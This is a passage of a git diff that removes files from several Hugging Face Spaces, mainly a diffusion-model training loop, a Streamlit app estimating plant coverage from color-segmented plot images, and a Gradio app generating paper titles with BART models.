- # Add the prior loss to the instance loss. - loss = loss + args.prior_loss_weight * prior_loss - else: - loss = F.mse_loss(noise_pred.float(), target.float(), reduction="mean") - - accelerator.backward(loss) - if accelerator.sync_gradients: - params_to_clip = ( - itertools.chain(unet.parameters(), text_encoder.parameters()) - if args.train_text_encoder - else unet.parameters() - ) - accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm) - optimizer.step() - lr_scheduler.step() - optimizer.zero_grad() - - # Checks if the accelerator has performed an optimization step behind the scenes - if accelerator.sync_gradients: - progress_bar.update(1) - global_step += 1 - - if global_step % args.checkpointing_steps == 0: - if accelerator.is_main_process: - save_path = os.path.join(args.output_dir, f"checkpoint-{global_step}") - accelerator.save_state(save_path) - logger.info(f"Saved state to {save_path}") - - logs = {"loss": loss.detach().item(), "lr": lr_scheduler.get_last_lr()[0]} - progress_bar.set_postfix(**logs) - accelerator.log(logs, step=global_step) - - if global_step >= args.max_train_steps: - break - - accelerator.wait_for_everyone() - - # Create the pipeline using using the trained modules and save it. - if accelerator.is_main_process: - pipeline = StableDiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - unet=accelerator.unwrap_model(unet), - text_encoder=accelerator.unwrap_model(text_encoder), - ) - pipeline.save_pretrained(args.output_dir) - - if args.push_to_hub: - upload_folder( - repo_id=repo_id, - folder_path=args.output_dir, - commit_message="End of training", - ignore_patterns=["step_*", "epoch_*"], - ) - - accelerator.end_training() - - -if __name__ == "__main__": - main() diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py deleted file mode 100644 index 83fd1341d82a4ec2e371f7b8ec3f112df624084b..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py +++ /dev/null @@ -1,21 +0,0 @@ -from typing import TYPE_CHECKING - -from ...utils import ( - _LazyModule, -) - - -_import_structure = {"pipeline_consistency_models": ["ConsistencyModelPipeline"]} - -if TYPE_CHECKING: - from .pipeline_consistency_models import ConsistencyModelPipeline - -else: - import sys - - sys.modules[__name__] = _LazyModule( - __name__, - globals()["__file__"], - _import_structure, - module_spec=__spec__, - ) diff --git a/spaces/philschmid/furiosa-ai-ocr/README.md b/spaces/philschmid/furiosa-ai-ocr/README.md deleted file mode 100644 index af9010527fa5db2606ea1fb5a76321489473c7d8..0000000000000000000000000000000000000000 --- a/spaces/philschmid/furiosa-ai-ocr/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Furiosa Ai Ocr -emoji: 🦀 -colorFrom: blue -colorTo: pink -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/phyloforfun/GreenSight/app.py b/spaces/phyloforfun/GreenSight/app.py deleted file mode 100644 index 9cd69bddc751ebcc4468eb228b960253e295be15..0000000000000000000000000000000000000000 --- a/spaces/phyloforfun/GreenSight/app.py +++ /dev/null @@ -1,619 +0,0 @@ -import os, math, csv, shutil, itertools -import streamlit as st -from streamlit_image_select import image_select -import cv2 -import numpy as np -from PIL import Image -import matplotlib.colors as mcolors -from io import BytesIO - - -MAX_GALLERY_IMAGES = 50 -GALLERY_IMAGE_SIZE = 128 -MIN_AREA = 10 - -class DirectoryManager: - def __init__(self, output_dir): - self.dir_output = output_dir - self.mask_flag = os.path.join(output_dir, "mask_flag") - self.mask_plant = os.path.join(output_dir, "mask_plant") - self.mask_plant_plot = os.path.join(output_dir, "mask_plant_plot") - self.plant_rgb = os.path.join(output_dir, "plant_rgb") - self.plot_rgb = os.path.join(output_dir, "plot_rgb") - self.plant_rgb_warp = os.path.join(output_dir, "plant_rgb_warp") - self.plant_mask_warp = os.path.join(output_dir, "plant_mask_warp") - self.data = os.path.join(output_dir, "data") - - def create_directories(self): - os.makedirs(self.dir_output, exist_ok=True) - os.makedirs(self.mask_flag, exist_ok=True) - os.makedirs(self.mask_plant, exist_ok=True) - os.makedirs(self.mask_plant_plot, exist_ok=True) - os.makedirs(self.plant_rgb, exist_ok=True) - os.makedirs(self.plot_rgb, exist_ok=True) - os.makedirs(self.plant_rgb_warp, exist_ok=True) - os.makedirs(self.plant_mask_warp, exist_ok=True) - os.makedirs(self.data, exist_ok=True) - - - -def hex_to_hsv_bounds(hex_color, sat_value, val_value): - # Convert RGB hex to color - rgb_color = mcolors.hex2color(hex_color) - hsv_color = mcolors.rgb_to_hsv(np.array(rgb_color).reshape(1, 1, 3)) - - # Adjust the saturation and value components based on user's input - hsv_color[0][0][1] = sat_value / 255.0 # Saturation - hsv_color[0][0][2] = val_value / 255.0 # Value - - hsv_bound = tuple((hsv_color * np.array([179, 255, 255])).astype(int)[0][0]) - - return hsv_bound - -def warp_image(img, vertices): - # Compute distances between the vertices to determine the size of the target square - distances = [np.linalg.norm(np.array(vertices[i]) - np.array(vertices[i+1])) for i in range(len(vertices)-1)] - distances.append(np.linalg.norm(np.array(vertices[-1]) - np.array(vertices[0]))) # Add the distance between the last and first point - max_distance = max(distances) - - # Define target vertices for the square - dst_vertices = np.array([ - [max_distance - 1, 0], - [0, 0], - [0, max_distance - 1], - [max_distance - 1, max_distance - 1] - ], dtype="float32") - - # Compute the perspective transform matrix using the provided vertices - matrix = cv2.getPerspectiveTransform(np.array(vertices, dtype="float32"), dst_vertices) - - # Warp the image to the square - warped_img = cv2.warpPerspective(img, matrix, (int(max_distance), int(max_distance))) - - return warped_img - -# Assuming get_points_from_contours is a function that takes a tuple of four contours -# and returns their respective centroid points as a list of tuples [(x1,y1), (x2,y2), (x3,y3), (x4,y4)] -def get_points_from_contours(contours): - centroids = [] - for contour in contours: - # Compute the centroid for the contour - M = cv2.moments(contour) - if M["m00"] != 0: - cX = int(M["m10"] / M["m00"]) - cY = int(M["m01"] / M["m00"]) - centroids.append((cX, cY)) - else: - # If the contour is a single point or line (which should not happen with flags), handle it here - pass - return centroids - -# Function to display the image with the selected quadrilateral superimposed -def display_image_with_quadrilateral(image, points): - # Make a copy of the image to draw on - overlay_image = image.copy() - - # Draw the quadrilateral - cv2.polylines(overlay_image, [np.array(points)], isClosed=True, color=(0, 255, 0), thickness=3) - - # Display the image with the quadrilateral - st.image(overlay_image, caption="Quadrilateral on Image", use_column_width='auto') - -# Function to update displayed quadrilateral based on selected index -def update_displayed_quadrilateral(index, point_combinations, base_image_path): - # Extract the four points of the current quadrilateral - quad_points = get_points_from_contours(point_combinations[index]) - - # Read the base image - base_image = cv2.imread(base_image_path) - - # If the image is not found, handle the error appropriately - if base_image is None: - st.error("Failed to load image.") - return - - # Display the image with the selected quadrilateral - display_image_with_quadrilateral(base_image, quad_points) - -def quadrilateral_area(centroids): - # Assuming centroids are in correct order (A, B, C, D) to form a quadrilateral - def distance(p1, p2): - return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2) - - A, B, C, D = centroids - # Using Bretschneider's formula to calculate area of a quadrilateral - a = distance(A, B) - b = distance(B, C) - c = distance(C, D) - d = distance(D, A) - p = (a + b + c + d) / 2 # semi-perimeter - return math.sqrt((p - a) * (p - b) * (p - c) * (p - d)) - -def sort_permutations_by_area(valid_permutations): - # Calculate area for each permutation and return sorted list - perm_areas = [(perm, quadrilateral_area(get_points_from_contours(perm))) for perm in valid_permutations] - # Sort by area in descending order (largest first) - perm_areas.sort(key=lambda x: x[1], reverse=True) - # Return only the sorted permutations, not the areas - sorted_permutations = [perm for perm, area in perm_areas] - return sorted_permutations - -def is_valid_quadrilateral(centroids): - if len(centroids) != 4: - return False - - def ccw(A, B, C): - return (C[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (C[0] - A[0]) - - def intersect(A, B, C, D): - return ccw(A, C, D) != ccw(B, C, D) and ccw(A, B, C) != ccw(A, B, D) - - A, B, C, D = centroids - return not (intersect(A, B, C, D) or intersect(A, D, B, C)) - -def process_image(image_path, flag_lower, flag_upper, plant_lower, plant_upper, loc, file_name, file_exists, selected_img, headers, base_name): - with loc: - btn_back, btn_next = st.columns([2,2]) - - img = cv2.imread(image_path) - - # Check if image is valid - if img is None: - print(f"Error reading image from path: {image_path}") - return None, None, None, None, None, None, None, None, None, None - - hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # Convert image to HSV - - # Explicitly ensure bounds are integer tuples - flag_lower = tuple(int(x) for x in flag_lower) - flag_upper = tuple(int(x) for x in flag_upper) - plant_lower = tuple(int(x) for x in plant_lower) - plant_upper = tuple(int(x) for x in plant_upper) - - flag_mask = cv2.inRange(hsv_img, flag_lower, flag_upper) - plant_mask = cv2.inRange(hsv_img, plant_lower, plant_upper) - - # # Find contours - # contours, _ = cv2.findContours(flag_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) - - # # Sort contours by area and keep only the largest 4 - # sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True)[:4] - - # # If there are not 4 largest contours, return - # if len(sorted_contours) != 4: - # return None, None, None, None, None, None, None, None, None, None - - - # Find contours - contours, _ = cv2.findContours(flag_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) - - # Sort contours by area and keep a significant number, assuming noise has much smaller area - sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True) - - # Filter out noise based on a predefined area threshold - significant_contours = [cnt for cnt in sorted_contours if cv2.contourArea(cnt) > MIN_AREA] - - # Logic to handle cases where there are more than 4 significant contours - centroids = [] - if len(significant_contours) < 4: - return None, None, None, None, None, None, None, None, None, None - elif len(significant_contours) > 4: - st.session_state['keep_quad'] = False - # while not st.session_state['keep_quad']: - with loc: - st.warning("Cycle until correct plot bounds are found") - # Create all possible combinations of four points - if len(significant_contours) >= 4: - # Generate all permutations of four points from the significant contours - permutations_of_four = list(itertools.permutations(significant_contours, 4)) - - # Filter out invalid quadrilaterals - valid_permutations0 = [perm for perm in permutations_of_four if is_valid_quadrilateral(get_points_from_contours(perm))] - - valid_permutations = sort_permutations_by_area(valid_permutations0) - - if not valid_permutations: - st.error("No valid quadrilaterals found.") - return None, None, None, None, None, None, None, None, None, None - - # Placeholder for quadrilateral indices - selected_quad_index = 0 - - # Function to update displayed quadrilateral based on selected index - def update_displayed_quadrilateral(index): - # Extract the four points of the current quadrilateral - centroids = get_points_from_contours(valid_permutations[index]) - return centroids - - # Show initial quadrilateral - centroids = update_displayed_quadrilateral(selected_quad_index) - - with btn_back: - # Button to go to the previous quadrilateral - if st.button('Previous'): - st.session_state.quad_index = (st.session_state.quad_index - 1) % len(valid_permutations) - centroids = update_displayed_quadrilateral(st.session_state.quad_index) - - with btn_next: - # Button to go to the next quadrilateral - if st.button('Next'): - st.session_state.quad_index = (st.session_state.quad_index + 1) % len(valid_permutations) - centroids = update_displayed_quadrilateral(st.session_state.quad_index) - - with loc: - if st.button('Keep Plot Bounds'): - st.session_state['keep_quad'] = True - if st.button('Save as Failure'): - st.session_state['keep_quad'] = True - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"NA", f"NA", f"NA"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.rerun() - - # If there are exactly 4 largest contours, proceed with existing logic - elif len(significant_contours) == 4: - # Create a new mask with only the largest 4 contours - largest_4_flag_mask = np.zeros_like(flag_mask) - cv2.drawContours(largest_4_flag_mask, sorted_contours, -1, (255), thickness=cv2.FILLED) - - # Compute the centroid for each contour - for contour in sorted_contours: - M = cv2.moments(contour) - if M["m00"] != 0: - cx = int(M["m10"] / M["m00"]) - cy = int(M["m01"] / M["m00"]) - else: - cx, cy = 0, 0 - centroids.append((cx, cy)) - - # Compute the centroid of the centroids - centroid_x = sum(x for x, y in centroids) / 4 - centroid_y = sum(y for x, y in centroids) / 4 - - # Sort the centroids - centroids.sort(key=lambda point: (-math.atan2(point[1] - centroid_y, point[0] - centroid_x)) % (2 * np.pi)) - - if len(centroids) == 4: - # Create a polygon mask using the sorted centroids - poly_mask = np.zeros_like(flag_mask) - cv2.fillPoly(poly_mask, [np.array(centroids)], 255) - - # Mask the plant_mask with poly_mask - mask_plant_plot = cv2.bitwise_and(plant_mask, plant_mask, mask=poly_mask) - - # Count the number of black pixels inside the quadrilateral - total_pixels_in_quad = np.prod(poly_mask.shape) - white_pixels_in_quad = np.sum(poly_mask == 255) - black_pixels_in_quad = total_pixels_in_quad - white_pixels_in_quad - - # Extract the RGB pixels from the original image using the mask_plant_plot - plant_rgb = cv2.bitwise_and(img, img, mask=mask_plant_plot) - - # Draw the bounding quadrilateral - plot_rgb = plant_rgb.copy() - for i in range(4): - cv2.line(plot_rgb, centroids[i], centroids[(i+1)%4], (0, 0, 255), 3) - - # Convert the masks to RGB for visualization - flag_mask_rgb = cv2.cvtColor(flag_mask, cv2.COLOR_GRAY2RGB) - orange_color = [255, 165, 0] # RGB value for orange - flag_mask_rgb[np.any(flag_mask_rgb != [0, 0, 0], axis=-1)] = orange_color - - plant_mask_rgb = cv2.cvtColor(plant_mask, cv2.COLOR_GRAY2RGB) - mask_plant_plot_rgb = cv2.cvtColor(mask_plant_plot, cv2.COLOR_GRAY2RGB) - bright_green_color = [0, 255, 0] - plant_mask_rgb[np.any(plant_mask_rgb != [0, 0, 0], axis=-1)] = bright_green_color - mask_plant_plot_rgb[np.any(mask_plant_plot_rgb != [0, 0, 0], axis=-1)] = bright_green_color - - # Warp the images - plant_rgb_warp = warp_image(plant_rgb, centroids) - plant_mask_warp = warp_image(mask_plant_plot_rgb, centroids) - - return flag_mask_rgb, plant_mask_rgb, mask_plant_plot_rgb, plant_rgb, plot_rgb, plant_rgb_warp, plant_mask_warp, plant_mask, mask_plant_plot, black_pixels_in_quad - -def calculate_coverage(mask_plant_plot, plant_mask_warp, black_pixels_in_quad): - # Calculate the percentage of white pixels for mask_plant_plot - white_pixels_plot = np.sum(mask_plant_plot > 0) - total_pixels_plot = mask_plant_plot.size - plot_coverage = (white_pixels_plot / black_pixels_in_quad) * 100 - - # Convert plant_mask_warp to grayscale - plant_mask_warp_gray = cv2.cvtColor(plant_mask_warp, cv2.COLOR_BGR2GRAY) - - # Calculate the percentage of white pixels for plant_mask_warp - white_pixels_warp = np.sum(plant_mask_warp_gray > 0) - total_pixels_warp = plant_mask_warp_gray.size - warp_coverage = (white_pixels_warp / total_pixels_warp) * 100 - - # Calculate the area in cm^2 of the mask_plant_plot - # Given that the real-life size of the square is 2 square meters or 20000 cm^2 - plot_area_cm2 = (white_pixels_warp / total_pixels_warp) * 20000 - - return round(plot_coverage,2), round(warp_coverage,2), round(plot_area_cm2,2) - -def get_color_parameters(): - # Color pickers for hue component - FL, FL_S, FL_SS = st.columns([2,4,4]) - with FL: - flag_lower_hex = st.color_picker("Flag Color Lower Bound Hue", "#33211f") - with FL_S: - flag_lower_sat = st.slider("Flag Lower Bound Saturation", 0, 255, 120) - with FL_SS: - flag_lower_val = st.slider("Flag Lower Bound Value", 0, 255, 150) - - FU, FU_S, FU_SS = st.columns([2,4,4]) - with FU: - flag_upper_hex = st.color_picker("Flag Color Upper Bound Hue", "#ff7700") - with FU_S: - flag_upper_sat = st.slider("Flag Upper Bound Saturation", 0, 255, 255) - with FU_SS: - flag_upper_val = st.slider("Flag Upper Bound Value", 0, 255, 255) - - PL, PL_S, PL_SS = st.columns([2,4,4]) - with PL: - plant_lower_hex = st.color_picker("Plant Color Lower Bound Hue", "#504F49") - with PL_S: - plant_lower_sat = st.slider("Plant Lower Bound Saturation", 0, 255, 30) - with PL_SS: - plant_lower_val = st.slider("Plant Lower Bound Value", 0, 255, 30) - - PU, PU_S, PU_SS = st.columns([2,4,4]) - with PU: - plant_upper_hex = st.color_picker("Plant Color Upper Bound Hue", "#00CFFF") - with PU_S: - plant_upper_sat = st.slider("Plant Upper Bound Saturation", 0, 255, 255) - with PU_SS: - plant_upper_val = st.slider("Plant Upper Bound Value", 0, 255, 255) - - # Get HSV bounds using the modified function - flag_lower_bound = hex_to_hsv_bounds(flag_lower_hex, flag_lower_sat, flag_lower_val) - flag_upper_bound = hex_to_hsv_bounds(flag_upper_hex, flag_upper_sat, flag_upper_val) - plant_lower_bound = hex_to_hsv_bounds(plant_lower_hex, plant_lower_sat, plant_lower_val) - plant_upper_bound = hex_to_hsv_bounds(plant_upper_hex, plant_upper_sat, plant_upper_val) - - return flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound - -def save_img(directory, base_name, mask): - mask_name = os.path.join(directory, os.path.basename(base_name)) - cv2.imwrite(mask_name, mask) - -def validate_dir(dir): - if not os.path.exists(dir): - os.makedirs(dir, exist_ok=True) - -def make_zipfile(source_dir, output_filename): - shutil.make_archive(output_filename, 'zip', source_dir) - return output_filename + '.zip' - -def save_uploaded_file(directory, img_file, image=None): - if not os.path.exists(directory): - os.makedirs(directory) - # Assuming the uploaded file is an image - if image is None: - with Image.open(img_file) as image: - full_path = os.path.join(directory, img_file.name) - image.save(full_path, "JPEG") - # Return the full path of the saved image - return full_path - else: - full_path = os.path.join(directory, img_file.name) - image.save(full_path, "JPEG") - return full_path - -def create_download_button(dir_to_zip, zip_filename): - zip_filepath = make_zipfile(dir_to_zip, zip_filename) - with open(zip_filepath, 'rb') as f: - bytes_io = BytesIO(f.read()) - st.download_button( - label=f"Download Results for{st.session_state['processing_add_on']}",type='primary', - data=bytes_io, - file_name=os.path.basename(zip_filepath), - mime='application/zip' - ) - -def delete_directory(dir_path): - try: - shutil.rmtree(dir_path) - st.session_state['input_list'] = [] - st.session_state['input_list_small'] = [] - # st.success(f"Deleted previously uploaded images, making room for new images: {dir_path}") - except OSError as e: - st.error(f"Error: {dir_path} : {e.strerror}") - -def clear_image_gallery(): - delete_directory(st.session_state['dir_uploaded_images']) - delete_directory(st.session_state['dir_uploaded_images_small']) - validate_dir(st.session_state['dir_uploaded_images']) - validate_dir(st.session_state['dir_uploaded_images_small']) - -def reset_demo_images(): - st.session_state['dir_input'] = os.path.join(st.session_state['dir_home'],"demo") - st.session_state['input_list'] = [os.path.join(st.session_state['dir_input'], fname) for fname in os.listdir(st.session_state['dir_input']) if fname.endswith(('.jpg', '.jpeg', '.png'))] - n_images = len([f for f in os.listdir(st.session_state['dir_input']) if os.path.isfile(os.path.join(st.session_state['dir_input'], f))]) - st.session_state['processing_add_on'] = f" {n_images} Images" - st.session_state['uploader_idk'] += 1 - -def main(): - _, R_coverage, R_plot_area_cm2, R_save = st.columns([5,2,2,2]) - img_gallery, img_main, img_seg, img_green, img_warp = st.columns([1,4,2,2,2]) - - st.session_state['dir_uploaded_images'] = os.path.join(st.session_state['dir_home'],'uploads') - st.session_state['dir_uploaded_images_small'] = os.path.join(st.session_state['dir_home'],'uploads_small') - uploaded_files = st.file_uploader("Upload Images", type=['jpg', 'jpeg'], accept_multiple_files=True, key=st.session_state['uploader_idk']) - if uploaded_files: - # Clear input image gallery and input list - clear_image_gallery() - - # Process the new iamges - for uploaded_file in uploaded_files: - file_path = save_uploaded_file(st.session_state['dir_uploaded_images'], uploaded_file) - st.session_state['input_list'].append(file_path) - - img = Image.open(file_path) - img.thumbnail((GALLERY_IMAGE_SIZE, GALLERY_IMAGE_SIZE), Image.Resampling.LANCZOS) - file_path_small = save_uploaded_file(st.session_state['dir_uploaded_images_small'], uploaded_file, img) - st.session_state['input_list_small'].append(file_path_small) - print(uploaded_file.name) - - # Set the local images to the uploaded images - st.session_state['dir_input'] = st.session_state['dir_uploaded_images'] - - st.session_state['input_list'] = [os.path.join(st.session_state['dir_input'], fname) for fname in os.listdir(st.session_state['dir_input']) if fname.endswith(('.jpg', '.jpeg', '.png'))] - - n_images = len([f for f in os.listdir(st.session_state['dir_input']) if os.path.isfile(os.path.join(st.session_state['dir_input'], f))]) - st.session_state['processing_add_on'] = f" {n_images} Images" - uploaded_files = None - st.session_state['uploader_idk'] += 1 - st.info(f"Processing **{n_images}** images from {st.session_state['dir_input']}") - - if st.session_state['dir_input'] is None: - reset_demo_images() - - # dir_input = st.text_input("Input directory for images:", value=os.path.join(st.session_state['dir_home'],"demo")) - dir_output = os.path.join(st.session_state['dir_home'],"demo_out") # st.text_input("Output directory:", value=os.path.join(st.session_state['dir_home'],"demo_out")) - - directory_manager = DirectoryManager(dir_output) - directory_manager.create_directories() - - run_name = st.text_input("Run name:", value="test") - file_name = os.path.join(directory_manager.data, f"{run_name}.csv") - headers = ['image',"plant_coverage_uncorrected_percen", "plant_coverage_corrected_percent", "plant_area_corrected_cm2"] - file_exists = os.path.isfile(file_name) - st.button("Reset Demo Images", on_click=reset_demo_images) - - - if len(st.session_state['input_list']) == 0 or st.session_state['input_list'] is None: - st.balloons() - create_download_button(dir_output, run_name) - - else: - with img_gallery: - selected_img = image_select("Select an image", st.session_state['input_list'], use_container_width=False) - base_name = os.path.basename(selected_img) - create_download_button(dir_output, run_name) - - if selected_img: - - selected_img_view = Image.open(selected_img) - with img_main: - st.image(selected_img_view, caption="Selected Image", use_column_width='auto') - - flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound = get_color_parameters() - - flag_mask, plant_mask, mask_plant_plot, plant_rgb, plot_rgb, plant_rgb_warp, plant_mask_warp, plant_mask_bi, mask_plant_plot_bi, black_pixels_in_quad = process_image(selected_img, flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound, R_save, file_name, file_exists, selected_img, headers, base_name) - - if plant_mask_warp is not None: - plot_coverage, warp_coverage, plot_area_cm2 = calculate_coverage(mask_plant_plot_bi, plant_mask_warp, black_pixels_in_quad) - - with R_coverage: - st.markdown(f"Uncorrected Plant Coverage: {plot_coverage}%") - with R_plot_area_cm2: - st.markdown(f"Corrected Plant Coverage: {warp_coverage}%") - st.markdown(f"Corrected Plant Area: {plot_area_cm2}cm2") - - # Display masks in galleries - with img_seg: - st.image(plant_mask, caption="Plant Mask", use_column_width=True) - st.image(flag_mask, caption="Flag Mask", use_column_width=True) - with img_green: - st.image(mask_plant_plot, caption="Plant Mask Inside Plot", use_column_width=True) - st.image(plant_rgb, caption="Plant Material", use_column_width=True) - with img_warp: - st.image(plot_rgb, caption="Plant Material Inside Plot", use_column_width=True) - st.image(plant_rgb_warp, caption="Plant Mask Inside Plot Warped to Square", use_column_width=True) - # st.image(plot_rgb_warp, caption="Flag Mask", use_column_width=True) - with R_save: - st.write(f"Showing plot outline #{st.session_state.quad_index}") - if st.button('Save'): - # Save the masks to their respective folders - save_img(directory_manager.mask_flag, base_name, flag_mask) - save_img(directory_manager.mask_plant, base_name, plant_mask) - save_img(directory_manager.mask_plant_plot, base_name, mask_plant_plot) - save_img(directory_manager.plant_rgb, base_name, plant_rgb) - save_img(directory_manager.plot_rgb, base_name, plot_rgb) - save_img(directory_manager.plant_rgb_warp, base_name, plant_rgb_warp) - save_img(directory_manager.plant_mask_warp, base_name, plant_mask_warp) - - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"{plot_coverage}", f"{warp_coverage}", f"{plot_area_cm2}"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.session_state['quad_index'] = 0 - st.rerun() - else: - with R_save: - if st.button('Save as Failure'): - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"NA", f"NA", f"NA"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.session_state['quad_index'] = 0 - st.rerun() - - -st.set_page_config(layout="wide", page_title='GreenSight') - -if 'dir_home' not in st.session_state: - st.session_state['dir_home'] = os.path.dirname(__file__) - -if 'dir_input' not in st.session_state: - st.session_state['dir_input'] = None - -if 'processing_add_on' not in st.session_state: - st.session_state['processing_add_on'] = ' 1 Image' - -if 'uploader_idk' not in st.session_state: - st.session_state['uploader_idk'] = 1 - -if 'input_list' not in st.session_state: - st.session_state['input_list'] = [] - -if 'input_list_small' not in st.session_state: - st.session_state['input_list_small'] = [] - -if 'dir_uploaded_images' not in st.session_state: - st.session_state['dir_uploaded_images'] = os.path.join(st.session_state['dir_home'],'uploads') - validate_dir(os.path.join(st.session_state['dir_home'],'uploads')) - -if 'dir_uploaded_images_small' not in st.session_state: - st.session_state['dir_uploaded_images_small'] = os.path.join(st.session_state['dir_home'],'uploads_small') - validate_dir(os.path.join(st.session_state['dir_home'],'uploads_small')) - -if 'keep_quad' not in st.session_state: - st.session_state['keep_quad'] = False - -if 'quad_index' not in st.session_state: - st.session_state['quad_index'] = 0 - -st.title("GreenSight") -st.write("Simple color segmentation app to estimate the vegetation coverage in a plot. Corners of the plot need to be marked with solid, uniforly colored flags.") -st.write("If you exit the session before completing the segmentation of all images, all progress will be lost!") -main() diff --git a/spaces/pietrocagnasso/paper-title-generation/app.py b/spaces/pietrocagnasso/paper-title-generation/app.py deleted file mode 100644 index 8a3cb8dcdccf3ec79421584ec721b334cba77ff4..0000000000000000000000000000000000000000 --- a/spaces/pietrocagnasso/paper-title-generation/app.py +++ /dev/null @@ -1,42 +0,0 @@ -import gradio as gr -from TitleGenerator import SmallTitleGenerator -from transformers import AutoTokenizer - -tokenizer = AutoTokenizer.from_pretrained("pietrocagnasso/bart-paper-titles") - - -def generate(text): - type = text.split(":")[0] - text2 = ":".join(text.split(":")[1:]) - if type == "CS": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-cs") - result = tg.generate_title_on_spot(text2) - elif type == "AI": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-ai") - result = tg.generate_title_on_spot(text2) - elif type == "BIO": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-bio") - result = tg.generate_title_on_spot(text2) - else: - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles") - result = tg.generate_title_on_spot(text) - - return result - - -examples = [ - ["CS: Evaluation of on-road bicycle design was performed using surface EMG on 12 male volunteers. Three types of bicycle design, i.e., rigid frame, suspension and sports were studied. Bicycles with suspension were found to have lesser rider muscle fatigue. Bicycling posture leads to considerable discomfort and a variety of chronic injuries. This necessitates a proper bicycle design to avoid injuries and thereby enhance rider comfort. The objective of this study was to investigate the muscle activity during cycling on three different bicycle designs, i.e., rigid frame (RF), suspension (SU) and sports (SP) using surface electromyography (sEMG). Twelve male volunteers participated in this study. sEMG signals were acquired bilaterally from extensor carpi radialis (ECR), trapezius medial (TM), latissimus dorsi medial (LDM) and erector spinae (ES), during 30\u00a0min of cycling on each bicycle and after cycling. Time domain (RMS) and frequency domain (MPF) parameters were extracted from acquired sEMG signals. From the sEMG study, it was found that the fatigue in right LDM and ES were significantly (p\u00a0<\u00a00.05) higher in SP bicycle. This was corroborated by a psychophysical assessment based on RBG pain scale. The study also showed that there was a significantly lesser fatigue with the SU bicycle than the RF and SP bicycles. "], - ["AI: An autonomous system should act ethically, but what if it has no all-ethical choice? We model how to rank states violating multiple instances of ethical principles. We enable an autonomous system to use this ethic rank to rank its available plans. We guarantee that when a plan is chosen, it is the most ethical plan available. Autonomous systems such as unmanned vehicles are beginning to operate within society. All participants in society are required to follow specific regulations and laws. An autonomous system cannot be an exception. Inevitably an autonomous system will find itself in a situation in which it needs to not only choose to obey a rule or not, but also make a complex ethical decision. However, there exists no obvious way to implement the human understanding of ethical behaviour in computers. Even if we enable autonomous systems to distinguish between more and less ethical alternatives, how can we be sure that they would choose right? We consider autonomous systems with a hybrid architecture in which the highest level of reasoning is executed by a rational (BDI) agent. For such a system, formal verification has been used successfully to prove that specific rules of behaviour are observed when making decisions. We propose a theoretical framework for ethical plan selection that can be formally verified. We implement a rational agent that incorporates a given ethical policy in its plan selection and show that we can formally verify that the agent chooses to execute, to the best of its beliefs, the most ethical available plan. "], - ["BIO: It has been hypothesized that calcifying fibrous tumoris the late regressive stage of inflammatory myofibroblastic tumor. By genome-wide methylation assay we could provide evidence that these lesions are a spectrum of one entity The well-known fusion genes ALK, ROS1 and RET, a hallmark of IMT, were not find in our CFT. Based on histological findings, calcifying fibrous tumor (CFT) may be a late (burned out) stage of inflammatory myofibroblastic tumor (IMT). This concept, however, has not been proven by molecular means.\n Five CFTs were analyzed for IMT-related rearrangements in ALK, ROS1 and RET using fluorescence in situ hybridization (FISH). Additionally, genome-wide methylation patterns were investigated and compared with IMT (n\u202f=\u202f7), leiomyoma (n\u202f=\u202f7), angioleiomyoma (n\u202f=\u202f9), myopericytoma (n\u202f=\u202f7) and reactive soft tissue lesions (n\u202f=\u202f10) using unsupervised hierarchical cluster analysis and t distributed stochastic neighbor embedding.\n CFT patients, 4 females and 1 male, had a median age of 20\u202fyears ranging from 7 to 43\u202fyears. Two patients were younger than 18\u202fyears old. The tumors originated in the abdomen (n\u202f=\u202f4) and axilla (n\u202f=\u202f1). Histologically, all lesions were (multi) nodular and hypocellular consisting of bland looking (myo)fibroblasts embedded in a collagenous matrix with calcifications.\n FISH analysis brought up negative results for ALK, RET and ROS1 rearrangements. However, genome-wide methylation analysis revealed overlapping methylation patterns of CFT and IMT forming a distinct homogeneous methylation cluster with exception of one case clustering with myopericytoma/angioleiomyoma.\n In conclusion, DNA methylation profiling supports the concept that CFT and IMT represent both ends of a spectrum of one entity with CFT being the burn out stage of IMT."], - [" We propose a novel Transformer-based Highlights Extractor (THExt, in short). We achieve performance superior to state-of-the-art highlights extraction methods on three benchmark datasets. 